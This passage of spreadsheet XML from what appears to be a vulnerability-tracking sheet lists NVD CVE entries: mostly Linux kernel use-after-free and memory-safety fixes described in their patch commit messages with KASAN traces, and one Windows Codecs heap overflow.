per entry so the smc_sock stays alive until the reader finishes. The
connection does not: a concurrent close runs smc_conn_free(), which
releases the receive buffer back to the link group pool.
smc_rx_pipe_buf_release() tests sk_state before taking the socket lock.
The state can change between the test and the lock, and
smc_rx_update_cons() then dereferences conn-&gt;rmb_desc and walks
conn-&gt;lgr, which smc_conn_free() has already released. On the
is_reg_err path smcr_buf_unuse() frees the descriptor outright, so
this is a use-after-free.
Take the socket lock first and test conn-&gt;freed instead.
smc_conn_free() sets that flag before releasing anything, and every
caller holds the socket lock. The two paths exclude each other: either
the pipe release runs first with everything valid, or it sees the flag
and skips the update.</t>
        </is>
      </c>
      <c r="S336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80982</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80991</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr"/>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ravb: serialize PTP clock teardown
ravb_ptp_interrupt() can race with ravb_ptp_stop() and pass the clock to
ptp_clock_event() while ptp_clock_unregister() is freeing it. This can
lead to a use-after-free.
Use READ_ONCE() and WRITE_ONCE() for lockless access to the clock pointer.
Atomically detach it with xchg() before disabling PTP interrupts, then
synchronize all IRQs which can invoke ravb_ptp_interrupt() before
unregistering the detached clock.
A handler which read the old pointer completes before the clock is
unregistered, while later handlers read NULL and skip the event.</t>
        </is>
      </c>
      <c r="S337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80991</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80992</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr"/>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ravb: avoid dereferencing an invalid PTP clock
The PTP clock is unavailable before the first open, so querying its
index can dereference a NULL pointer. Registration failures can also
leave an error pointer in priv-&gt;ptp.clock.
Cache the PHC index separately and report -1 while no clock is
registered. Normalize registration errors to NULL and preserve the
static timestamping capabilities.</t>
        </is>
      </c>
      <c r="S338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80992</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80994</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr"/>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: openvswitch: fix flow mask use-after-free on flow deletion
The commit in the Fixes tag below made so flow-&gt;mask free is scheduled
via RCU right after it is removed from the flow table.  The pointer
stays in the flow structure and it can be accessible while in the same
RCU critical section.  This is done to avoid requiring ovs_mutex for
the ovs_flow_free().
However, while removing the flow during processing of CMD_DEL, we do
not take RCU read lock before the removal, and ovs_flow_cmd_fill_info()
uses the flow-&gt;mask pointer afterwards.  The RCU read lock is taken,
but it's already late at that point.  The comment on that line
acknowledges that the lock is cosmetic and doesn't serve a real purpose.
This leads to use-after-free if the RCU grace period passes between
removal and the filling.  It is a short race window, but it is there
and can lead to a real crash in case memory allocation for the info
takes a bit longer:
 BUG: KASAN: slab-use-after-free in __ovs_nla_put_key
             net/openvswitch/flow_netlink.c:1996
 BUG: KASAN: slab-use-after-free in ovs_nla_put_key+0x2463/0x2e30
             net/openvswitch/flow_netlink.c:2250
 Read of size 4 at addr ffff88801ee89970 by task ovs_flow_del_ec/9487
 Call Trace:
  &lt;TASK&gt;
  __ovs_nla_put_key net/openvswitch/flow_netlink.c:1996
  ovs_nla_put_key+0x2463/0x2e30 net/openvswitch/flow_netlink.c:2250
  ovs_flow_cmd_fill_info+0x420/0x9c0 net/openvswitch/datapath.c:930
  ovs_flow_cmd_del+0x53a/0x970 net/openvswitch/datapath.c:1467
  ...
  netlink_rcv_skb+0x156/0x420 net/netlink/af_netlink.c:2556
  &lt;/TASK&gt;
 Allocated by task 9487:
  mask_alloc net/openvswitch/flow_table.c:967
  flow_mask_insert net/openvswitch/flow_table.c:1012
  ovs_flow_tbl_insert+0xea2/0x1a90 net/openvswitch/flow_table.c:1084
  ovs_flow_cmd_new+0x7e3/0xd90 net/openvswitch/datapath.c:1086
  ...
  netlink_rcv_skb+0x156/0x420 net/netlink/af_netlink.c:2556
 Freed by task 9485:
  rcu_free_sheaf+0x1e/0x100 mm/slub.c:5978
  rcu_do_batch kernel/rcu/tree.c:2645
  rcu_core+0x59c/0x10c0 kernel/rcu/tree.c:2897
  handle_softirqs+0x1e4/0x9a0 kernel/softirq.c:622
  ...
  instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1062
ovs_flow_tbl_remove() must be called after the ovs_flow_cmd_fill_info()
to avoid this race.  This also helps with cleaning up the forced cast
and the cosmetic RCU read lock.  Before the commit in the Fixes tag the
order did not matter as long as the flow object itself was not freed.
A wider RCU critical section could be another option, but we have a
GFP_KERNEL allocation in the way.
Reported by Trend Micro's Zero Day Initiative as ZDI-CAN-32042.</t>
        </is>
      </c>
      <c r="S339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80994</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80995</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr"/>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mctp: hold a reference to the route device in mctp_route_lookup()
mctp_route_lookup() uses rt-&gt;dev without holding a reference on it.
mctp_route_lookup_single() returns the route under RCU only, so the
route's device can be torn down concurrently: mctp_dev_put() drops the
last reference and synchronously kfree()s mdev-&gt;addrs.  mctp_dev_saddr()
then reads rt-&gt;dev-&gt;addrs[0], giving a use-after-free reachable by an
unprivileged local AF_MCTP user on the receive/forwarding path (no
CAP_NET_RAW required):
  BUG: KASAN: slab-use-after-free in mctp_route_lookup
  Read of size 1 at addr ... by task mctp_uaf/...
   mctp_route_lookup
   mctp_pkttype_receive
  Freed by task ...:
   kfree
   mctp_dev_put
   mctp_dev_notify
In the same window mctp_dst_from_route() -&gt; mctp_dev_hold() also
increments a refcount that has already reached zero
("refcount_t: addition on 0 ... mctp_dev_hold").
This reintroduces the use-after-free class of CVE-2023-3439: the source
address lookup was moved ahead of the point where the destination takes
its device reference.
Take a reference with refcount_inc_not_zero() before touching rt-&gt;dev,
skip a device that is already dead, and drop the reference once the
destination has taken its own.</t>
        </is>
      </c>
      <c r="S340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80995</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81000</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr"/>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: tun: bound receive headroom
tun_get_user() uses tun-&gt;align both as skb headroom and when choosing how
much packet data to keep linear. OVS can propagate an oversized headroom
request from another port to TUN or TAP.
When align is larger than the usable space in a one-page skb head,
SKB_MAX_HEAD(align) underflows and the result becomes negative when stored
in good_linear. That value later wraps when assigned to the size_t linear
variable, and tun_alloc_skb() can place skb-&gt;data outside the allocated
head.
Bound the headroom stored by TUN to the one-page skb-head budget and the
largest non-sentinel 16-bit skb header offset. Leave one linear byte for
raw TUN and a complete Ethernet header for TAP, including NET_IP_ALIGN.
Also pull the raw-TUN protocol byte and the TAP Ethernet header before
accessing them, so these checks remain safe for nonlinear skbs supplied by
other allocation paths.</t>
        </is>
      </c>
      <c r="S341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81000</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81001</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr"/>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
slip: fix use-after-free in sl_sync()
slip_devs[] stores bare net_device pointers and takes no reference on
them.  sl_sync() and sl_alloc() walk that table from slip_open() under
rtnl_lock(), while an entry is dropped by sl_free_netdev(), which
sl_setup() installs as dev-&gt;priv_destructor.
priv_destructor is called from netdev_run_todo(), which deliberately
runs with the RTNL semaphore released so that it can sleep while waiting
for the device refcount to drop:
	/* Snapshot list, allow later requests */
	list_replace_init(&amp;net_todo_list, &amp;list);
	__rtnl_unlock();
	...
		if (dev-&gt;priv_destructor)
			dev-&gt;priv_destructor(dev);	/* slip_devs[i] = NULL */
		if (dev-&gt;needs_free_netdev)
			free_netdev(dev);
		...
		/* Free network device */
		kobject_put(&amp;dev-&gt;dev.kobj);
So rtnl_lock() does not serialise slip_open() against the teardown at
all.  sl_sync() can load slip_devs[i] while the entry is still published
and dereference it after netdev_run_todo() has run the destructor and
released the device:
  CPU0 (slip_open)                 CPU1 (slip_close)
                                   unregister_netdev()
                                     rtnl_unlock()
                                       netdev_run_todo()
                                         __rtnl_unlock()
  rtnl_lock()
  sl_sync()
    dev = slip_devs[i]
                                         priv_destructor(dev)
                                           slip_devs[i] = NULL
                                         kobject_put(&amp;dev-&gt;dev.kobj)
                                           /* dev is freed */
    sl = netdev_priv(dev)
    if (sl-&gt;tty || sl-&gt;leased)     /* use-after-free */
  BUG: KASAN: use-after-free in sl_sync drivers/net/slip/slip.c:730 [inline]
  BUG: KASAN: use-after-free in slip_open+0xef4/0x1210 drivers/net/slip/slip.c:806
  Read of size 1 at addr ffff8880712dac71 by task syz-executor.2/6506
  CPU: 2 PID: 6506 Comm: syz-executor.2 Not tainted 6.1.134-syzkaller-00260-g0c8fc3469765 #0
  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
  Call Trace:
   sl_sync drivers/net/slip/slip.c:730 [inline]
   slip_open+0xef4/0x1210 drivers/net/slip/slip.c:806
   tty_ldisc_open+0xa2/0x120 drivers/tty/tty_ldisc.c:433
   tty_set_ldisc+0x324/0x720 drivers/tty/tty_ldisc.c:564
   tiocsetd drivers/tty/tty_io.c:2428 [inline]
   tty_ioctl+0x5f0/0x1530 drivers/tty/tty_io.c:2712
  Allocated by task 6502:
   alloc_netdev_mqs+0x98/0xfe0 net/core/dev.c:10719
   sl_alloc drivers/net/slip/slip.c:756 [inline]
   slip_open+0x36d/0x1210 drivers/net/slip/slip.c:817
   tty_ldisc_open+0xa2/0x120 drivers/tty/tty_ldisc.c:433
   tty_set_ldisc+0x324/0x720 drivers/tty/tty_ldisc.c:564
  Freed by task 6497:
   device_release+0xa2/0x240 drivers/base/core.c:2507
   kobject_put+0x179/0x280 lib/kobject.c:729
   netdev_run_todo+0x6c8/0xef0 net/core/dev.c:10509
   slip_close+0x166/0x1c0 drivers/net/slip/slip.c:906
   tty_ldisc_close+0x113/0x1a0 drivers/tty/tty_ldisc.c:456
   tty_ldisc_kill+0x94/0x160 drivers/tty/tty_ldisc.c:614
   tty_ldisc_release+0xe3/0x2b0 drivers/tty/tty_ldisc.c:782
   tty_release+0xbcc/0xe70 drivers/tty/tty_io.c:1860
Commit e58c19124189 ("slip: Fix use-after-free Read in slip_open") fixed
a different source of stale entries - a device left in slip_devs[] after
slip_open() freed it on the registration error path - and does not
address this race, which is why the report survives it.
Drop the entry from ndo_uninit instead.  unregister_netdevice() calls
ndo_uninit under RTNL, before the device is queued to netdev_run_todo(),
so an entry that sl_sync() can still see while holding RTNL belongs to a
device that cannot be freed until RTNL is dropped.  sl_free_netdev()
stays only for the slip_open() error path, where register_netdevice()
may have failed before ndo_init and ndo_uninit is then not called
either.  Both running for the same device is harmless: the
---truncated---</t>
        </is>
      </c>
      <c r="S342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81001</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81006</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr"/>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi: Remove all sysfs files on registration failure
ipmi_add_smi() creates the nr_users and nr_msgs files before trying to
create the maintenance_mode file. If that last creation fails, the error
path removes only nr_users before dropping the final reference to the
interface.
Remove nr_msgs as well so no sysfs attribute embedded in the freed
interface remains registered.</t>
        </is>
      </c>
      <c r="S343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81006</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81008</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr"/>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
interconnect: Fix use after free in icc_get() and of_icc_get_by_index()
In of_icc_get_by_index() and icc_get(), if the dynamic allocation for
path-&gt;name fails via kasprintf(), the error handling path directly
calls kfree(path) to free the path object and returns an error.
However, prior to this point, path_find() calls path_init(), which
already links the path's requests into the req_list of the respective
interconnect nodes via hlist_add_head(). Directly invoking kfree(path)
leaves dangling pointers in the hlist. A subsequent call to icc_get()
or icc_set_bw() will traverse or modify these corrupted lists, triggering
a slab use afterfree.
KASAN report showing the vulnerability when reproducing via debugfs:
  BUG: KASAN: slab-use-after-free in path_find+0x6f8/0xcfc
  Write of size 8 at addr fff000000d43f748 by task sh/1
  ...
  Call trace:
   kasan_report+0xac/0xfc
   path_find+0x6f8/0xcfc
   icc_get+0x148/0x380
   icc_get_set+0xf8/0x2d0
  ...
  Freed by task 1:
   kfree+0x1a0/0x4a4
   icc_get+0x2cc/0x380
   icc_get_set+0xf8/0x2d0
Fix this by replacing kfree(path) with the proper teardown function,
icc_put(path), which safely removes the requests from the req_list using
hlist_del() and drops the provider usage references before freeing the
memory.
Additionally, in icc_get(), ensure that the icc_lock mutex is released
prior to calling icc_put(path) to avoid a deadlock, as icc_put()
internally acquires the same lock.</t>
        </is>
      </c>
      <c r="S344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81008</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81010</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr"/>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring/waitid: honor task_work cancellation
io_waitid_cb() may run through the fallback task_work path when
task_work_add() can no longer queue work to the originating task. The
fallback runs from a kworker and io_uring marks such task work as
canceled through tw.cancel.
io_waitid_cb() currently ignores tw.cancel and calls __do_wait().
waitid is task-context dependent: __do_wait() performs child lookup
relative to current, and the retry path also uses
current-&gt;signal-&gt;wait_chldexit. If the callback runs from the fallback
kworker, current is therefore not the task that submitted the request.
Honor tw.cancel before entering __do_wait(). Complete the request with
-ECANCELED and skip the siginfo copy, since canceled task work may run
without the submitting task's userspace execution context.
Keep the existing siginfo handling for normal waitid completion and
explicit cancellation.</t>
        </is>
      </c>
      <c r="S345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81010</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81015</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr"/>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86/amd/pmc: Fix LPS0 and debugfs leaks when STB init fails
amd_pmc_probe() registers the LPS0 s2idle handler with
acpi_register_lps0_dev() and creates the driver's debugfs directory before
calling amd_stb_s2d_init(), which is the last step in probe that can fail.
When amd_stb_s2d_init() fails (for example the S2D telemetry region cannot
be ioremapped on a long-running system, or the SMU rejects the S2D setup)
the error path only calls pci_dev_put() and returns.  This leaves
amd_pmc_s2idle_dev_ops on the global lps0_s2idle_devops_head list and leaks
the debugfs directory, while the devm-managed resources backing the handler
are torn down.
Reloading the module then walks the corrupted list in
acpi_register_lps0_dev() and hits:
  list_add corruption. next-&gt;prev should be prev, but was NULL.
  kernel BUG at lib/list_debug.c:29!
   acpi_register_lps0_dev+0x44/0x80
   amd_pmc_probe+0x224/0x380 [amd_pmc]
   platform_probe+0x67/0x90
Even without a reload, the stale registration means the next s2idle
transition calls into torn-down driver state.
Unwind the debugfs directory and the LPS0 registration on the
amd_stb_s2d_init() error path.  acpi_unregister_lps0_dev() is safe to call
unconditionally here: it is guarded on the same conditions as
acpi_register_lps0_dev(), which is exactly what amd_pmc_remove() already
relies on.</t>
        </is>
      </c>
      <c r="S346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81015</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81353</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr"/>
      <c r="Q347" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
